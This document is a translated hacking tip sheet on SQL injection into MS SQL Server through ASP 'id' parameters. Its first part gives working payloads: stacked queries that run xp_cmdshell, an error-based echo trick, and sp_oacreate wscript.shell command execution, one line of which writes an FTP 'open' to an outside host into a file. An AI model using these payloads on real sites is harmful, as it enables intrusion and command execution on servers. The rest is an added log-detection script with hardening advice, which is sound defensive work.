Author: Alpha, from http://www.cnwill.com/
1. Displaying the output of commands run through cmd
When the injection point runs with sa permissions, it is very painful not to be able to see the command output. Brother Zhu's NBSI also tries to show the output. Why? Haha
Below I introduce a method that definitely lets you see the output. I don't know what method John uses.
Create a table.
Statement: http://www.xxxxx.com/down/list.asp?id=1;create table dirs (paths varchar(1000));--
Return: normal page. The table is created successfully! Continue!
Statement: http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_cmdshell 'net user';--
Return: normal page. The data was written to dirs normally.
Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs);--
Return: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value '***' to a column of data type int.
^_^, so we can see the echoed result. Of course, brute-forcing the table contents with NBSI will be faster.
Similarly, other extended stored procedures can use the same method to retrieve their output, such as regread (not tested).
2. xp_dirtree write-path problems
The NBSI directory-listing tool is not very useful. Sometimes the columns cannot be displayed even though the data is actually there; you can view the table data directly (default table name: NB_TreeList_Tmp).
3. Vulnerability detection
NBSI's vulnerability detection function is nothing to write home about. I recommend manually checking whether the parameter is numeric or a quoted string when you write the test; that way you are on the safe side (:P)
4. xpsql70.dll and xp_cmdshell deleted: solving the upload failure problem
Actually czy said this a long time ago. I remember lzy said it too, but it seems different from this.
Declare @s int
Exec sp_oacreate "wscript.shell", @s out
-- Exec sp_oamethod @s, "run", NULL, "cmd.exe /c echo open asp.7i24.com> c: a.txt"
This is executed in the Query Analyzer; it can also be run directly from the address bar, as shown in the following figure:
Declare @s int; exec sp_oacreate "wscript.shell", @s out; exec sp_oamethod @s, "run", NULL, "cmd.exe /c echo aaa> c: a.txt"
Not tested at the injection point.
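From the defender's side, the techniques in points 1 and 4 above (stacked queries after a numeric id, calls to xp_cmdshell or sp_oacreate, and the deliberate varchar-to-int conversion error used as an echo channel) all leave a recognisable trace in the web server's request log, and point 3 hints at the fix: a numeric parameter must actually be numeric. The following Python script is an added example, not code from the original post or from NBSI; it runs a few pattern rules over constructed log lines in a simplified "ip method path query" format (the real IIS log layout is assumed to have been reduced to that form beforehand) and includes the server-side numeric check. The log lines, IPs and rule names are all constructed for the example.

```python
"""Detect stacked-query / error-based SQL injection patterns in request logs
and validate numeric parameters. Added example, not from the original post."""
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not real traffic, not from the original post),
# reduced to "ip method path query".
SAMPLE_LOG = [
    "10.0.0.5 GET /down/list.asp id=1",
    "10.0.0.5 GET /down/list.asp id=1;create+table+dirs+(paths+varchar(1000));--",
    "10.0.0.5 GET /down/list.asp id=1;insert+dirs+exec+master.dbo.xp_cmdshell+'net+user';--",
    "10.0.0.5 GET /down/list.asp id=1+and+0<>(select+top+1+paths+from+dirs);--",
    "10.0.0.5 GET /down/list.asp id=1;declare+@s+int;exec+sp_oacreate+'wscript.shell',@s+out;--",
    "10.0.0.6 GET /down/list.asp id=42",
]

# Each rule corresponds to one of the techniques described in the post.
RULES = {
    # ";create table ..." / ";insert ... exec ..." appended after the id value
    "stacked_query": re.compile(
        r";\s*(create|insert|declare|exec(ute)?|drop|update|delete)\b", re.I),
    # extended / OLE automation procedures that run commands or read the registry
    "dangerous_proc": re.compile(
        r"\b(xp_cmdshell|sp_oacreate|sp_oamethod|xp_dirtree|xp_regread)\b", re.I),
    # "and 0<>(select top 1 ...)" forces the varchar->int error used as an echo channel
    "error_based_probe": re.compile(r"\b(and|or)\b\s*\d+\s*<>\s*\(\s*select\b", re.I),
    # trailing "--" comment that discards the rest of the original query
    "comment_tail": re.compile(r"--\s*$"),
}


def analyze(line):
    """Return a finding dict for one log line, or None if no rule matched."""
    parts = line.split(" ", 3)
    if len(parts) < 3:
        return None
    ip, method, path = parts[:3]
    # decode %xx and '+' so the rules see the query as the database would
    query = unquote_plus(parts[3]) if len(parts) == 4 else ""
    hits = sorted(name for name, rx in RULES.items() if rx.search(query))
    if not hits:
        return None
    severity = "high" if "dangerous_proc" in hits else "medium"
    return {"ip": ip, "method": method, "path": path, "query": query,
            "rules": hits, "severity": severity}


def scan(lines):
    """Run analyze() over every line and keep only the lines that matched."""
    return [f for f in (analyze(line) for line in lines) if f is not None]


def numeric_param_ok(query, name="id"):
    """Server-side check from point 3: a numeric parameter must be all digits.
    Returns False for a missing, repeated, or non-numeric value, so every
    payload above is rejected before it reaches the database."""
    values = []
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            values.append(unquote_plus(value))
    return len(values) == 1 and values[0].isdigit()


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["path"], f["rules"])
    for line in SAMPLE_LOG:
        print(numeric_param_ok(line.split(" ", 3)[3]), line)
```

The numeric check is the cheap fix; the structural ones are parameterised queries instead of string concatenation, an application login that is not sa, and leaving xp_cmdshell and the OLE automation procedures disabled so that even a successful injection has nowhere to go.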